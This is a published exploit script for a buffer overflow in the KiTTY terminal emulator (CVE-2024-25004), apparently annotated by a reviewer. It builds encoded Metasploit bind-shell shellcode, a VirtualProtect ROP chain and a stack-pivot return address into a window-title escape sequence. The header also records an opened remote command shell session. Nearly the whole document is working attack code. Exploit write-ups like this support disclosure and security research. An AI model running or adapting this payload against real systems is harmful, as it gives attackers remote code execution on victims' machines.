- # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
- # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/
- # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
- # Version: ≤ 0.76.1.13
- # Tested on: Microsoft Windows 11/10/8/7/XP
- # CVE: CVE-2024-25004
- #-------------------------------------------------------------------------------------#
- # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
- #-------------------------------------------------------------------------------------#
- # msf6 payload(windows/shell_bind_tcp) > to_handler #
- # [*] Payload Handler Started as Job 1 #
- # msf6 payload(windows/shell_bind_tcp) > #
- # [*] Started bind TCP handler against 192.168.100.28:4444 #
- # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) #
- #-------------------------------------------------------------------------------------#
- import sys
- import os
- import struct
- #-------------------------------------------------------------------------------------#
- # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
- # windows/shell_bind_tcp - 355 bytes #
- # https://metasploit.com/ #
- # Encoder: x86/shikata_ga_nai #
- # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, #
- # PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
- # AutoVerifySession=true #
- #-------------------------------------------------------------------------------------#
# Encoded stage: windows/shell_bind_tcp (LPORT 4444), 355 bytes, passed through
# x86/shikata_ga_nai with -b '\x00\x07\x0a\x0d\x1b\x9c' (see the generate line
# above).  This is opaque generator output: regenerate it rather than hand-edit.
# NOTE(review): the blob contains a 0x9d byte (sixth byte of the sixth chunk)
# although the "Badchars" comment later in the file lists \x9d as bad; the
# generate command excluded only six bytes.  Confirm 0x9d survives the
# target's parser before relying on this payload.
buf = b"".join([
    b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e",
    b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90",
    b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d",
    b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e",
    b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f",
    b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52",
    b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e",
    b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a",
    b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a",
    b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22",
    b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7",
    b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a",
    b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7",
    b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf",
    b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd",
    b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12",
    b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17",
    b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81",
    b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40",
    b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0",
    b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30",
    b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3",
    b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56",
    b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb",
    b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3",
    b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39",
    b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea",
    b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e",
    b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c",
    b"\x62\xb6\x24\xb2\xd1\xb7\x6c",
])
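def shellcode(payload=None, size=1042):
    """Build the fixed-size shellcode region placed at the head of the overflow.

    Layout: a 14-byte stack-adjust stub, then the encoded payload, then NOP
    (0x90) padding up to ``size`` bytes.  The stub computes
    0x44444444 - 0x44442444 = 0x2000 in EAX and subtracts it from ESP, so the
    stack is moved 8 KiB away from this buffer before the payload runs.  None
    of the stub bytes is a null, which is presumably why the constant is built
    by subtraction instead of a direct ``mov eax, 0x2000`` (that encoding
    contains 0x00 bytes) -- verify the intent against the live target.

    Args:
        payload: Encoded payload bytes.  Defaults to the module-level ``buf``.
        size:    Total length of the returned region.  Defaults to 1042, the
                 "Shellcode size at ESP" the exploit header reports.

    Returns:
        Exactly ``size`` bytes.

    Raises:
        ValueError: if stub + payload exceeds ``size``.  The original used
            ``assert``, which ``python -O`` strips; it would then silently emit
            an oversized region with no padding.
    """
    if payload is None:
        payload = buf
    stub = b"".join((
        b"\xBB\x44\x24\x44\x44",  # mov ebx, 0x44442444
        b"\xB8\x44\x44\x44\x44",  # mov eax, 0x44444444
        b"\x29\xD8",              # sub eax, ebx      ; eax = 0x2000
        b"\x29\xC4",              # sub esp, eax      ; esp -= 0x2000
    ))
    body = stub + payload
    if len(body) > size:
        raise ValueError(
            "shellcode is %d bytes, exceeds the %d-byte region" % (len(body), size)
        )
    return body + b"\x90" * (size - len(body))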
def create_rop_chain():
    """Return the mona.py-generated VirtualProtect ROP chain as packed bytes.

    Every gadget is annotated by mona as living in kitty.exe.  Registers are
    loaded in the order mona's pushad layout expects and the chain ends in
    PUSHAD # RETN; in that convention ESI holds &VirtualProtect (read through
    the IAT), EBP a PUSH ESP # RETN gadget that becomes the return target,
    EBX/EDX/ECX the dwSize (0x201) / flNewProtect (0x40) / lpOldProtect
    scratch arguments, and EDI a RETN used as a ROP NOP -- confirm against
    the live process before changing any value.

    NOTE(review): the addresses encode 0x00 throughout, plus 0x07
    (0x00484e07) and 0x0d (0x00430dce), all of which the "Badchars" comment in
    this file lists as bad characters; the published PoC nonetheless reports a
    shell, so the constraint presumably does not cover this region.

    Returns:
        bytes: 25 little-endian DWORDs (100 bytes).
    """
    gadgets = []

    # --- ESI = VirtualProtect, dereferenced from the IAT ---
    gadgets += [
        0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN
        0x006424a4,  # -> EAX: ptr to &VirtualProtect() [IAT kitty.exe]
    ]
    gadgets += [0x41414141] * 7  # compensate ADD ESP,14 (5 dwords) + 2 pops
    gadgets += [
        0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN
        0x00473cf6,  # XCHG EAX,ESI # RETN
    ]
    # --- EBP = PUSH ESP; RETN 0 (where VirtualProtect returns to) ---
    gadgets += [0x00429953, 0x005405b0]  # POP EBP # RETN ; PUSH ESP # RETN 0
    # --- EBX = 0x201 (dwSize) ---
    gadgets += [0x0049d9f9, 0x00000201]  # POP EBX # RETN ; 0x201
    # --- EDX = 0x40 (flNewProtect) ---
    gadgets += [0x00430dce, 0x00000040]  # POP EDX # RETN ; 0x40
    # --- ECX = writable location (lpOldProtect) ---
    gadgets += [0x005ac58c, 0x004d81d9]  # POP ECX # RETN ; &writable
    # --- EDI = RETN (ROP NOP) ---
    gadgets += [0x004fa404, 0x005a2001]  # POP EDI # RETN ; RETN
    # --- EAX = 0x90909090; the extra POP EBX swallows one filler ---
    gadgets += [0x004cd011, 0x90909090, 0x41414141]  # POP EAX # POP EBX # RETN
    # --- trigger ---
    gadgets.append(0x005dfbac)  # PUSHAD # RETN

    return struct.pack("<%dI" % len(gadgets), *gadgets)
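rop_chain = create_rop_chain()

# ----------------------------------------------------------------------------------
# Badchars (per the original header): \x00\x07\x0a\x0d\x1b\x9c\x9d
#   NOTE(review): the encoded payload in ``buf`` was generated with only the first
#   six excluded (it contains a \x9d), and the return address and ROP chain below
#   encode \x00, \x07 and \x0d bytes.  The author reports a working shell, so the
#   list presumably constrains only the payload bytes or is over-broad; confirm in
#   a debugger before relying on any of this.
# Return address: 0x00529720 = ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP
#   # RETN in kitty.exe, i.e. a 0x134 + 4*4 = 324 (0x144) byte stack pivot.  mona
#   tags the module "startnull" (address begins with a 0x00 byte) and the page
#   PAGE_EXECUTE_READWRITE.
# Shellcode size at ESP: 1042 bytes.
# ----------------------------------------------------------------------------------
return_address = struct.pack("<I", 0x00529720)
rop_chain_padding = b"\x90" * 27  # gap between the pivot landing point and the chain
nops = b"\x90" * 88               # trailing slide before the OSC terminator

# Relative jump back toward the shellcode region.  The encoding E9 3D FA FF FF is
# disp32 = 0xFFFFFA3D = -1475, applied from the end of this 5-byte instruction,
# i.e. 1470 bytes before the jmp itself (the original comment said "$eip-1471").
# Where that lands depends on how the target laid the buffer out in memory; verify
# the landing address under a debugger if any length in this file changes.
jmp_back = b"\xE9\x3D\xFA\xFF\xFF"

# The overflow rides inside an OSC 0 (set window title) sequence, ESC ] 0 ; ... BEL.
# The title starts with "__dt:localhost:", which the vulnerable duplicated-session
# handling presumably keys on (see the exploit title and blog) -- not verifiable
# from this file alone.
escape_sequence = b"".join((
    b"\033]0;__dt:localhost:",
    shellcode(),
    return_address,
    rop_chain_padding,
    rop_chain,
    jmp_back,
    nops,
    b"\007",
))

# Write on the binary layer of the real stdout object rather than through a second
# file object opened over fd 1 with os.fdopen(), which would close fd 1 when it is
# garbage-collected.  Flush the text layer first so ordering is preserved if
# anything was printed earlier.
sys.stdout.flush()
stdout = sys.stdout.buffer
stdout.write(escape_sequence)
stdout.flush()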